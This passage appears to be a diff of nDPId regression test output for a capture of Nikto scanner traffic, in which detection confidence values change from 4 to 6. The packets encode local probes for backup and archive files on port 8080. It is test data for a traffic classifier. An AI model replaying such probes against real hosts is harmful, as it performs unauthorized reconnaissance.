00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277033,"pkt":"AAAAAAAAAAAAAAAACABFAAC9R6NAAEAG9JV\/AAABfwAAAcNcH5BSP3\/MbAOkN4AYAED+sQAAAQEICp1m\/FGdZvxRR0VUIC8wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277034,"pkt":"AAAAAAAAAAAAAAAACABFAADCi6hAAEAGsIt\/AAABfwAAAcNeH5CrCbPNtCCkdYAYAED+tgAAAQEICp1m\/FKdZvxSR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277036,"pkt":"AAAAAAAAAAAAAAAACABFAADCaYNAAEAG0rB\/AAABfwAAAcNgH5BETFHrIT\/7L4AYAED+tgAAAQEICp1m\/FSdZvxUR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277037,"pkt":"AAAAAAAAAAAAAAAACABFAADByHVAAEAGc79\/AAABfwAAAcNiH5AsIfAZ9PZ+lIAYAED+tQAAAQEICp1m\/FWdZvxVR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277040,"pkt":"AAAAAAAAAAAAAAAACABFAADBLYNAAEAGDrJ\/AAABfwAAAcNkH5B8OhXu0\/0OtIAYAED+tQAAAQEICp1m\/FidZvxXR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277041,"pkt":"AAAAAAAAAAAAAAAACABFAADJ0PZAAEAGazZ\/AAABfwAAAcNmH5D3m+iZ0R8Y8oAYAED+vQAAAQEICp1m\/FmdZvxZR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277042,"pkt":"AAAAAAAAAAAAAAAACABFAADJPvJAAEAG\/Tp\/AAABfwAAAcNoH5CMHAadHXRwyoAYAED+vQAAAQEICp1m\/FqdZvxaR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277044,"pkt":"AAAAAAAAAAAAAAAACABFAADCjwZAAEAGrS1\/AAABfwAAAcNqH5Br7rdq4TxVq4AYAED+tgAAAQEICp1m\/FydZvxcR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 